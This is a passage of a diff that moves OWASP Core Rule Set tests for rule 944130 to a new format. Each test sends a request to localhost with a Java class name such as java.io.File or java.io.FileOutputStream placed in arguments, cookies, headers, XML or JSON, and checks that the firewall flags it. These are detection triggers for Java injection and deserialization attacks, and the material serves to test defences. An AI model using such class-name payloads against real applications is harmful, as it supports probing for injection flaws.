"test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log: + expect_ids: [944130] + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log: + expect_ids: [944130] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 104 desc: "Request header test includes keyword 